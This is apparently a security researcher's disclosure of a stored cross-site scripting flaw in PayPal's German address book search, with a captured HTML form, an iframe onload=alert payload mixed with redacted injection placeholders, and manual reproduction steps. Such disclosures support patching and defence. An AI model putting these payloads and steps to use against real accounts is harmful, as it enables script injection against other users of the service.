Vulnerable Module(s):
[+] Adressbuch > Search > Benutzer/Kontakt

Vulnerable Parameter(s):
[+] search_str - Results

Affected Section(s):
[+] Results - Index (Listing)


Proof of Concept:
=================
The persistent vulnerability can be exploited by remote attackers with
privileged paypal user account and low required user interaction.
For demonstration or reproduce ...

PoC: [Existing Listing] (Index) Adressbuch > Search > Benutzer/Kontakt >
results

<form sourceindex="5" method="post" name="searchContact"
action="https://www.paypal.com/de/cgi-bin/webscr?
SESSION=4b304_obgVN3fxg6LFp08F6lUBD7aWq0HG3SWv5HSmrKxR_xRzWrZOtwRDq&
dispatch=5885d80a13c0db1f8e263663d3faee8d8494db97
03d295b4a2116480ee01a05c" class=""><input name="cmd" value="_flow"
type="hidden"><input id="baseUrl" name="baseUrl"
value="www.paypal.com/de" type="hidden"><input id="selectLabel"
name="selectLabel" value="" type="hidden"><input id="currentid"
name="current_id" value="0" type="hidden"><input id="CONTEXT_CGI_VAR"
name="CONTEXT" value="X3-7SZn2ExXucINxlliZ_05NdFsrIIpaV9TcRYNLL
_GiOwm9XgEZzWKQeV0" type="hidden"><div class="searchMainDiv"><fieldset
id="searchBy"><legend class="accessAid">Suchen</legend><span
class="floatLeft"><label
for="search_str"><strong>Suchen</strong></label><input sourceindex="6"
autocomplete="off" id="search_str"
name="search_str" value=""><[PERSISTENT SCRIPT CODE INJECTION] <"
type="text"><input sourceindex="7"
name="searchGo.x" value="Los" class="button elemAjax"
type="submit"></span><span><input sourceindex="8" name="addContact.x"
value="Neuen Kontakt hinzufügen" class="button floatRight"
type="submit"></span></fieldset></div><div class="floatLeft"
id="resultPanel"><div id="resultDiv"><div id="leftSide"><ul id="val"><li
class="rowLeft oddRow focus" id="L1">
<span class="results">"><[PERSISTENT SCRIPT CODE INJECTION]"…</span'><span
class='viewEditLink
show'></span></li></ul></div><div
id='rightSideDiv' class='withBorder' tabindex='0'><div class='view
show'><h3>"><[PERSISTENT SCRIPT CODE INJECTION] <("</h3><div
class='links'> <span
class='buttonAsLink'><input type='submit'
name='editCID-T22A-J6G3-GZBY-SHK8.x' value='Bearbeiten'></span>
| <span class='buttonAsLink'><input type='submit' id='delete'
name='deleteCID-T22A-J6G3-GZBY-SHK8.x' value='Löschen'
class='deleteButton'></span></span></div><div
class='info'><span class='address'>"><iframe src=a
onload=alert(" "><iframe src=a onload=alert("</span><span
class='address'>"><[PERSISTENT SCRIPT CODE INJECTION] <")
<</span><span
class='address'>bkm@vulnerability-lab.com</span><span
class='address'>Deutschland</span></div><div
class='info'><span class='address
heading'>Zusatzinformationen</span><span
class='address'>"><[PERSISTENT SCRIPT CODE INJECTION] <")
<</span></div><div class='info'><span
class='address heading'>Rechnungsadresse</span><span
class='address'>"><[PERSISTENT SCRIPT CODE INJECTION] <")
<<br>Deutschland</span></div></div></div></div></iframe></span></li>
</ul></div></div></div><input name="auth"
value="M8_dK6Q4HG9oPBKoZ_4I6YQ6TWdaI00OnfMkOwWXQ6pOZjZRca8TSAO38hIC585zYBbTFKQz1Qg7UOte0VbD_ah-
dzZjkiuSC-unZSf6mNBym71XfmcQvdV0WPwOUivermg9_ZZWTQH7yV9OG-bLLIzxH3ZFUJHX0uQzwZ-4v65aKp5013-712a
00pnY9m2cURtoC02BRhB_kOkuODdR5I6pS_NXG5ZmIMgnrJhkSgYl09piAB0icMRkReu"
type="hidden">
<input name="form_charset" value="UTF-8" type="hidden"></form>


Note:

The name with the code was saved in the addressbook. Only the matching
and successful result leads to the persistent execution of the web context.
When the other user is searching the existing account of the addressbook
the code will be executed persistent out of the matching search result
web context listing. If you do not know this it will be a bit harder to
reproduce. The bug is 100% existing because the screenshots show it
and also the poc. I found the issue by manually exploitation over the
different application layers and function. Maybe i guessed to implement
this details to the submission. The requested code with the malicious
persistent code can be reviewed in the attached poc document.


Manually reproduce ...

1. Go to the addressbook and switch to add a new contact to adressbook
2. Include script code (html/js) as username to the addressbook and save
the context
2. Now, switch to the user search (addressbook) module (other layer) &
click the user contact search to activate
3. Include the exact name of the username (script code (html/js)) from
the addressbook and press the search button
4. The context of the other layer from the addressbook will be executed
directly out of the results listing page of the exisiting user contacts
5. Done! POST REQUEST: method="post" name="searchContact"